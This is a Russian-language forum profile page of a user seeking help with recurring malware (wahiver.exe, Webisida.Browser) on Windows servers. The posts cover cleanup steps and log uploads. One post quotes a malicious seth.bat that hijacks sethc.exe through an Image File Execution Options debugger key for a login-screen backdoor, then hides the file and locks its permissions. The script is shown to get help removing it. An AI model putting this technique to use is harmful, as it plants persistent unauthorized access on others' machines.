
serga612
Новички-
Публикаций
10 -
Зарегистрирован
-
Посещение
Репутация
0Информация о serga612
-
Статус
Новичок
-
Спасибо!
-
результат в виде ссылки не увидел, а вместо этого Вы зачем-то загрузили файл на Вирусинфо. Промахнулся. https://www.virustotal.com/gui/file/190ce0a2fc65ec52860899c5597ddbff81d41d0fd673874b9ea0d5fa986e7378/detection
-
В данный момент на этом сервере она не воспроизводится. Т.к. серверов несколько (и время от времени оно возникает на них снова) то вариант лечения такой: KVRT + MBAM + контролировать ключи реестра из файла seth.bat?
-
Содержимое файла seth.bat: echo copy seth.exe "%windir%\system32" set d="%windir%\system32\seth.exe" reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe" /v Debugger /t REG_SZ /d "seth.exe" /f echo.HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe [19]>"%tmp%"\reg.txt && regini "%tmp%"\reg.txt && del "%tmp%"\reg.txt @attrib +s +h %d% @echo Y| cacls %d% /t /g SYSTEM:r @echo S| cacls %d% /t /g SYSTEM:r @echo J| cacls %d% /t /g SYSTEM:r @echo O| cacls %d% /t /
-
Задание планировщика C:\Temp\MonitProcess.ps1 мне известно C:\Temp\moveconversation.ps1 неи ( и сегодня нет уже людей на работе, которые могли бы прояснить), но я просмотрел текст скрипта и думаю, что знаю, кто его написал и вроде как это не должно запускать вирусы. Инструкцию выполнил. FARbar берёт данные из буфера обмена, или в ней пропущен пункт "вставить"? Лог прилагаю. Fixlog.txt
-
Сделано. Desktop.zip
-
Результат загрузки Файл сохранён как 190325_133853_quarantine_5c98d9ed1cfc2.zip Размер файла 8837 MD5 30bc46f472ca5fa8ea41e6f8443c7d13 Файл закачан, спасибо! Это был ответ по ссылке. По поводу сборщика логов - странный момент: Первый раз он у меня запустился и отработал нормально. Теперь всё время выдаёт сообщение: Вы запустили сборщик логов из терминальной сессии - Пожалуйста, запустите сборщик логов из консоли. Причём даже при запуске из консоли Hyper-V так происходит.
-
Cпасибо, сейчас сделаю. Я читал правила и прикреплял лог, видимо что-то пошло не так, а я этого не заметил. Кстати говоря, прочитав правила, я сначала запустил KVRT, а после того, как тот отработал - логгер. Может имеет смысл сначала запустить логгер, до того, как вирусы будут удалены с сервера? CollectionLog-2019.03.25-13.55.zip
-
Добрый день. На серверах появляются в запущенные процессы wahiver.exe Webisida.Browser SecureSurf.Browser Кроме этого 2 процесса запускаются как службы. KVRT это всё удаляет (а ещё быстрее я руками удаляю всю папку C:\Windows\Inf\NETLIBRARIESTIP), но оно возвращается каждый раз - т.е. источник всей этой заразы у меня найти не вышло.
- 18 ответов
-
- wahiver
- Webisida.Browser
-
(и ещё 1 )
C тегом: